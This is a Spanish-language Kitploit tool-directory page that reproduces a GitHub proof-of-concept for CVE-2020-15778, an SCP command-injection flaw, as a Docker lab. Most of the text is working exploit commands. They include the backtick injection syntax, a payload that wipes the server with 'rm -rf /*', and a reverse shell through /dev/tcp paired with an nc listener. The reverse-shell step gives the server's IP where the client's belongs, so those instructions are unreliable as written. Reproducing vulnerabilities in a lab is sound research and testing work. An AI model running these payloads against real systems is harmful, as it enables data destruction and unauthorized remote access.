Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-15778 — Reproduce el exploit de inyección de comandos SCP CVE-2020-15778 con una configuración cliente-servidor basada en Docker para probar la ejecución remota de código y payloads de shell inversa. | Kitploit
Herramientas/GitHubGitHub/yifanzhg/cve-2020-15778
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

Reproduce el exploit de inyección de comandos SCP CVE-2020-15778 con una configuración cliente-servidor basada en Docker para probar la ejecución remota de código y payloads de shell inversa.

Ver Repositorio
3hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-15778

Introducción

Este repositorio reproduce CVE-2020-15778.

Pasos

  1. Construye las imágenes docker para el servidor scp y el cliente
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. Levanta el servidor scp en un contenedor.
root@kitploit:~
docker run -d -P --name scp-server server-cve

Obtén la dirección IP interna del servidor scp con:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. Ejecuta el cliente en un contenedor.
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. Inyecta tu propio comando de shell en el servidor scp llamando al comando scp desde el cliente.

En la terminal del cliente, ejecuta:

root@kitploit:~
scp nil.txt root@<IP interna del servidor scp>:'`tu comando`/tmp'

La contraseña es "PASSWORD".

Ejemplos

Aquí hay algunos ejemplos para este exploit.

  1. Borra todo en el servidor para bloquearlo.
root@kitploit:~
scp nil.txt root@<IP interna del servidor scp>:'`rm -rf /*`/tmp'
  1. Refleja el bash del servidor scp hacia el cliente (imitando ssh).

Escucha en un puerto de la máquina cliente.

root@kitploit:~
nc -lvvp 8080

Usa scp para forzar al servidor a mapear la bash interactiva hacia la máquina cliente.

root@kitploit:~
scp nil.txt root@<IP interna del servidor scp>:'`bash -i >& /dev/tcp/<IP interna del servidor scp>/8080 0>& 1`/tmp'

La dirección IP del cliente se puede obtener con:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
Descargar herramienta